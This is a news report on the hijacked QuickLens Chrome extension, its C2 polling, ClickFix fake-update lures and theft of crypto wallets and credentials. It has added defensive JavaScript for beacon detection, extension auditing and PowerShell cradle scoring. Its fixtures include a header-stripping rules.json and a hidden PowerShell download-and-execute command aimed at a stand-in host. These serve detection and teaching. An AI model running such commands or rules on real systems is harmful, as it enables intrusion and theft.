A Chrome extension named “QuickLens – Search Screen with Google Lens” has been removed from the Chrome Web Store after it was compromised to push malware and attempt to steal crypto from thousands of users.
QuickLens was initially published as a Chrome extension that lets users run Google Lens searches directly in their browser. The extension grew to roughly 7,000 users and, at one point, received a featured badge from Google.
However, on February 17, 2026, version 5.8 was released with malicious scripts that delivered ClickFix attacks and information-stealing functionality to everyone using the extension.
The malicious QuickLens extension
Security researchers at Annex first reported that the extension had recently changed ownership after being listed for sale on ExtensionHub, a marketplace where developers sell browser extensions.
Annex says that on February 1, 2026, the owner changed to support@doodlebuggle.top under “LLC Quick Lens,” with a new privacy policy hosted on a barely functional domain. Just over two weeks later, the malicious update was pushed to users.
Annex’s analysis shows that version 5.8 requested new browser permissions, including declarativeNetRequestWithHostAccess and webRequest.
It also included a declarativeNetRequest rules.json file that stripped HTTP security response headers, such as Content-Security-Policy (CSP), X-Frame-Options, and X-XSS-Protection, from every page and frame. With those headers gone, sites lose the protections that would otherwise block or complicate injected script execution.
The update also introduced communication with a command-and-control (C2) server at api.extensionanalyticspro[.]top. According to Annex, the extension generated a persistent UUID, fingerprinted the victim’s country using Cloudflare’s trace endpoint, identified the browser and OS, and then polled the C2 server every five minutes for instructions.
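The five-minute polling described above shows up in proxy or DNS telemetry as a very regular inter-request interval to a single host. The following is an added JavaScript (Node) example, not code from Annex or BleepingComputer: it groups a constructed proxy log by host and flags hosts whose request gaps have near-zero jitter. The log lines, the threshold values and the function names are assumptions made for illustration.

```javascript
// Constructed proxy log for illustration (not real telemetry):
// "ISO-8601 timestamp  host  path". The beacon host mirrors the one named
// in the article; the other entries are ordinary browsing noise.
const SAMPLE_LOG = `
2026-02-18T09:00:02Z api.extensionanalyticspro.top /extensions/callback?uuid=1f3b&extension=abc
2026-02-18T09:00:05Z www.cloudflare.com /cdn-cgi/trace
2026-02-18T09:01:10Z news.example.com /index.html
2026-02-18T09:05:03Z api.extensionanalyticspro.top /extensions/callback?uuid=1f3b&extension=abc
2026-02-18T09:07:44Z news.example.com /article/1
2026-02-18T09:10:01Z api.extensionanalyticspro.top /extensions/callback?uuid=1f3b&extension=abc
2026-02-18T09:15:04Z api.extensionanalyticspro.top /extensions/callback?uuid=1f3b&extension=abc
2026-02-18T09:18:30Z news.example.com /article/2
2026-02-18T09:20:02Z api.extensionanalyticspro.top /extensions/callback?uuid=1f3b&extension=abc
2026-02-18T09:25:03Z api.extensionanalyticspro.top /extensions/callback?uuid=1f3b&extension=abc
`.trim();

// Parse each line into {t: epoch seconds, host, path}.
function parseLog(text) {
  return text.split("\n").filter(Boolean).map((line) => {
    const [ts, host, path] = line.trim().split(/\s+/);
    return { t: Date.parse(ts) / 1000, host, path };
  });
}

// Lower-median of a numeric array (upper-middle element for even lengths).
function median(values) {
  const s = [...values].sort((a, b) => a - b);
  return s[Math.floor(s.length / 2)];
}

// Flag hosts contacted at least `minHits` times whose inter-request gaps have
// a median absolute deviation of at most `maxJitter` times the median gap.
// Both thresholds are assumptions; tune them against your own baseline.
function findBeacons(entries, { minHits = 4, maxJitter = 0.1 } = {}) {
  const byHost = new Map();
  for (const e of entries) {
    if (!byHost.has(e.host)) byHost.set(e.host, []);
    byHost.get(e.host).push(e.t);
  }
  const results = [];
  for (const [host, times] of byHost) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const period = median(gaps);
    const mad = median(gaps.map((g) => Math.abs(g - period)));
    const jitter = mad / period;
    if (jitter <= maxJitter) {
      results.push({ host, hits: times.length, periodSeconds: period, jitter });
    }
  }
  return results;
}

// Stand-alone run: prints the beaconing host with its ~300 s period.
console.log(JSON.stringify(findBeacons(parseLog(SAMPLE_LOG)), null, 2));
```

The check deliberately uses the median and median absolute deviation rather than mean and standard deviation, so a single delayed poll (a sleeping laptop, a retry) does not mask an otherwise regular beacon. A host that fires every 300 seconds with a few seconds of scheduler jitter lands well under the threshold; normal browsing does not.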
BleepingComputer learned about the extension this week after seeing numerous users [1, 2] reporting fake Google Update alerts on every web page they visited.
“That is appearing in every site I go, I thought it could be because Chrome wasn’t updated, but even after updating it continues to appear,” a user seeking help said on Reddit.
“Of course I will not run the code that it copies to my clipboard in the run box, but it keeps appearing in every site, making it impossible to interact with anything.”
BleepingComputer’s analysis of the extension showed it connected to a C2 server at https://api.extensionanalyticspro[.]top/extensions/callback?uuid=[uuid]&extension=kdenlnncndfnhkognokgfpabgkgehoddto, where it received an array of malicious JavaScript scripts.
These payloads were then executed on every page load using a technique that Annex described as a “1×1 GIF pixel onload trick.”

Because the extension stripped CSP headers on all visited sites, this inline JavaScript execution worked even on sites that would normally block it.
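To make the permission and header-stripping behaviour described above concrete, here is an added JavaScript (Node) example; it is not code from the QuickLens extension, from Annex or from BleepingComputer. It contains a constructed manifest.json and declarativeNetRequest rules.json modelled on the reported behaviour, a static audit that flags the high-risk permissions and header-removal rules, and a simulation of a site's response headers before and after the rules run, checked against the CSP logic that governs inline event handlers such as an onload attribute. The manifest contents, rule IDs, header values and function names are all assumptions made for illustration.

```javascript
// Constructed manifest.json and rules.json (assumptions modelled on the
// reported behaviour, not the real extension's files).
const MANIFEST = {
  manifest_version: 3,
  name: "Example extension (constructed)",
  permissions: ["declarativeNetRequestWithHostAccess", "webRequest", "storage"],
  host_permissions: ["<all_urls>"],
  declarative_net_request: {
    rule_resources: [{ id: "ruleset_1", enabled: true, path: "rules.json" }],
  },
};

const RULES = [
  {
    id: 1,
    priority: 1,
    action: {
      type: "modifyHeaders",
      responseHeaders: [
        { header: "content-security-policy", operation: "remove" },
        { header: "x-frame-options", operation: "remove" },
        { header: "x-xss-protection", operation: "remove" },
      ],
    },
    condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
  },
];

const SECURITY_HEADERS = new Set([
  "content-security-policy", "content-security-policy-report-only",
  "x-frame-options", "x-xss-protection", "strict-transport-security",
]);
const HIGH_RISK_PERMISSIONS = new Set([
  "declarativeNetRequestWithHostAccess", "webRequest", "webRequestBlocking",
  "scripting", "debugger",
]);

// Static audit of a manifest plus its declarativeNetRequest rules.
function auditExtension(manifest, rules) {
  const findings = [];
  for (const p of manifest.permissions || []) {
    if (HIGH_RISK_PERMISSIONS.has(p)) findings.push(`high-risk permission: ${p}`);
  }
  const hosts = manifest.host_permissions || [];
  if (hosts.includes("<all_urls>") || hosts.some((h) => /^\*:\/\/\*\//.test(h))) {
    findings.push("host access to all sites");
  }
  for (const r of rules) {
    if (r.action?.type !== "modifyHeaders") continue;
    const broad = !r.condition?.urlFilter || r.condition.urlFilter === "*";
    for (const h of r.action.responseHeaders || []) {
      if (h.operation === "remove" && SECURITY_HEADERS.has(h.header.toLowerCase())) {
        findings.push(`rule ${r.id} strips ${h.header}${broad ? " on every site" : ""}`);
      }
    }
  }
  return findings;
}

// Apply "remove" modifyHeaders rules to a response header map, the way the
// browser would for the given resource type. Other operations are not modelled.
function applyResponseRules(headers, rules, resourceType = "main_frame") {
  const out = new Map([...headers].map(([k, v]) => [k.toLowerCase(), v]));
  for (const r of rules) {
    if (r.action?.type !== "modifyHeaders") continue;
    const types = r.condition?.resourceTypes;
    if (types && !types.includes(resourceType)) continue;
    for (const h of r.action.responseHeaders || []) {
      if (h.operation === "remove") out.delete(h.header.toLowerCase());
    }
  }
  return out;
}

// Does the policy let inline event handlers (e.g. <img onload="...">) run?
// Handler attributes are governed by script-src-attr, falling back to script-src
// and then default-src. Nonces never apply to attributes, and 'unsafe-inline' is
// ignored once a nonce or hash source is present. 'unsafe-hashes' is treated as
// blocking here because the handler's hash is unknown to this check.
function inlineHandlersAllowed(csp) {
  if (!csp) return true; // no header at all: nothing is enforced
  const directives = new Map();
  for (const part of csp.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    const name = tokens[0]?.toLowerCase();
    if (name && !directives.has(name)) directives.set(name, tokens.slice(1).map((t) => t.toLowerCase()));
  }
  const governing = ["script-src-attr", "script-src", "default-src"].find((n) => directives.has(n));
  if (!governing) return true; // no script directive present
  const src = directives.get(governing);
  const hasNonceOrHash = src.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return src.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Walk-through: a site that blocks inline handlers, before and after the rules.
function demo() {
  const original = new Map([
    ["Content-Security-Policy", "default-src 'self'; script-src 'self' https://cdn.example"],
    ["X-Frame-Options", "DENY"],
    ["Content-Type", "text/html"],
  ]);
  const before = inlineHandlersAllowed(original.get("Content-Security-Policy"));
  const stripped = applyResponseRules(original, RULES);
  const after = inlineHandlersAllowed(stripped.get("content-security-policy"));
  return { before, after, remaining: [...stripped.keys()] };
}

console.log(auditExtension(MANIFEST, RULES));
console.log(demo()); // before: false, after: true, remaining: ["content-type"]
```

The audit is the check to run on any extension update that adds declarativeNetRequestWithHostAccess or webRequest: a header-removal rule on a wildcard urlFilter is almost never legitimate. The demo shows why the injected onload handler worked everywhere: the site's own script-src 'self' would have blocked it, but once the response header is deleted there is no policy left to evaluate.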
The first payload contacts google-update[.]icu, where it receives an additional payload that displays a fake Google Update prompt. Clicking the update button led to a ClickFix lure that asked users to “verify” themselves by pasting and running a command on their computer.

For Windows users, this led to the download of a malicious executable named “googleupdate.exe” [VirusTotal] that was signed with a certificate from “Hubei Da’e Zhidao Food Technology Co., Ltd.”
Upon execution, the malware launched a hidden PowerShell command that spawned a second PowerShell instance to connect to drivers[.]solutions/META-INF/xuoa.sys using a custom “Katzilla” user agent.
The response was piped into Invoke-Expression for execution. However, by the time BleepingComputer analyzed the payloads, the second-stage URL was no longer serving any malicious content.
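The hidden-PowerShell-spawns-PowerShell download cradle described above is the kind of sequence endpoint telemetry can catch regardless of what the second-stage URL happens to serve. The following is an added JavaScript (Node) example, not code from BleepingComputer or from any vendor: it scores constructed process-creation events (Sysmon-style fields, not real telemetry) for the traits the article reports: a hidden window, PowerShell spawned by PowerShell, a download cradle feeding Invoke-Expression, a custom User-Agent, and a parent running from a user-writable directory. The event data, the placeholder second-stage URL, the command lines and the scoring threshold are assumptions made for illustration.

```javascript
// Constructed process-creation events (assumptions, not real telemetry).
// The command lines approximate the chain the article describes; the URL is a placeholder.
const EVENTS = [
  { pid: 4120, image: "C:\\Users\\alice\\Downloads\\googleupdate.exe",
    parent: "C:\\Windows\\explorer.exe",
    cmd: "\"C:\\Users\\alice\\Downloads\\googleupdate.exe\"" },
  { pid: 4188, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parent: "C:\\Users\\alice\\Downloads\\googleupdate.exe",
    cmd: "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-omitted>" },
  { pid: 4201, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parent: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmd: "powershell -w hidden -ep bypass -c \"iex (iwr 'https://second-stage.example/stage2' -UserAgent 'Katzilla').Content\"" },
  { pid: 5010, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parent: "C:\\Windows\\System32\\cmd.exe",
    cmd: "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq Running\"" },
  { pid: 5044, image: "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
    parent: "C:\\Windows\\System32\\svchost.exe",
    cmd: "pwsh.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1" },
];

// Traits of a PowerShell download-and-execute cradle.
const HIDDEN = /-(w|win|windowstyle)\s+h(idden)?\b/i;              // -w hidden, -WindowStyle Hidden
const BYPASS = /-e(p|xecutionpolicy)\s+bypass/i;                   // -ep bypass
const CRADLE = /(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|DownloadString|DownloadFile|Start-BitsTransfer)/i;
const EXEC = /(Invoke-Expression|\biex\b)/i;                       // response piped into IEX
const CUSTOM_UA = /(-UserAgent\s+|\.UserAgent\s*=|Headers\.Add\(\s*['"]User-Agent)/i;
const WRITABLE_DIR = /\\(Downloads|Temp|AppData\\Local\\Temp)\\/i;

function isPowerShell(path) {
  return /(^|\\)(powershell|pwsh)\.exe$/i.test(path);
}

// Score one event: each matched trait adds one point and one reason.
function scoreEvent(ev) {
  const reasons = [];
  if (!isPowerShell(ev.image)) return { pid: ev.pid, score: 0, reasons };
  if (HIDDEN.test(ev.cmd)) reasons.push("hidden window");
  if (BYPASS.test(ev.cmd)) reasons.push("execution policy bypass");
  if (CRADLE.test(ev.cmd) && EXEC.test(ev.cmd)) reasons.push("download-and-execute cradle");
  if (CUSTOM_UA.test(ev.cmd)) reasons.push("custom User-Agent");
  if (isPowerShell(ev.parent)) reasons.push("PowerShell spawned by PowerShell");
  if (WRITABLE_DIR.test(ev.parent)) reasons.push("parent runs from a user-writable directory");
  return { pid: ev.pid, score: reasons.length, reasons };
}

// Return events whose score meets the threshold (an assumed starting point;
// a single trait such as "-ExecutionPolicy Bypass" is too common to alert on alone).
function detectCradles(events, threshold = 2) {
  return events.map(scoreEvent).filter((r) => r.score >= threshold);
}

console.log(JSON.stringify(detectCradles(EVENTS), null, 2));
```

Two events clear the bar: the first PowerShell (hidden window, launched by an executable in Downloads) and the child PowerShell (hidden, bypass, cradle, custom User-Agent, PowerShell parent). The interactive Get-Service call scores zero and the scheduled inventory script scores one, which is why the threshold matters more than any single regex.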
Another malicious JavaScript “agent” delivered by the https://api.extensionanalyticspro[.]top C2 was used to steal cryptocurrency wallets and credentials.
The extension would detect whether MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Backpack, Brave Wallet, Exodus, Binance Chain Wallet, WalletConnect, or the Argon crypto wallets were installed. If so, it would attempt to steal wallet activity and seed phrases, which could then be used to hijack the wallets and drain their assets.
Another script captured login credentials, payment information, and other sensitive form data.
Additional payloads were used to scrape Gmail inbox contents, extract Facebook Business Manager advertising account data, and collect YouTube channel information.
A review of the now-removed Chrome extension page claims that macOS users were targeted with the AMOS (Atomic Stealer) infostealer. BleepingComputer has not been able to independently verify if these claims are true.
Google has since removed QuickLens from the Chrome Web Store, and Chrome now automatically disables it for affected users.

Users who installed QuickLens – Search Screen with Google Lens should ensure the extension is fully removed, scan their device for malware, and reset any passwords stored in or entered through the browser while the malicious version was installed.
If you use any of the mentioned cryptocurrency wallets, you should transfer your funds to a new wallet.
This extension is not the first to be used in ClickFix attacks. Last month, Huntress discovered a browser extension that intentionally crashed browsers and then displayed fake fixes that installed the ModeloRAT malware.